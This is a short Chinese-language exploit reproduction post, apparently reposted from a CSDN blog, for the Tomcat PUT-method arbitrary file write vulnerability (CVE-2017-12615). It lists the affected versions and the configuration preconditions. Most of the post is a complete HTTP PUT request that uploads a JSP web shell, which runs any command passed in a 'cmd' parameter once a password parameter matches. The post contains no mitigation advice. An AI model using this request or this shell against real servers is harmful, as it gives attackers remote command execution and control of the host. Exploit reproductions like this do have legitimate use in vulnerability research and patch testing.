ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

漏洞复现系列--Tomcat-PUT方法任意文件写入(CVE-2017-12615)

2020-01-14 11:36:37  阅读:318  来源: 互联网

标签:71.0 Tomcat GET Content 7.0 PUT 2017


1、漏洞利用前提:
Tomcat版本: 7.0.0 - 7.0.81
配置文件conf/web.xml中的readonly设置为false
开启了PUT方法

2、复现过程:
用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件

PUT /1.jsp/ HTTP/1.1
Host: 对应的网站host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("pwd".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("hello");}%>
梦之履行地 发布了6 篇原创文章 · 获赞 0 · 访问量 1757 私信 关注

标签:71.0,Tomcat,GET,Content,7.0,PUT,2017
来源: https://blog.csdn.net/qq_40007043/article/details/103969844

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有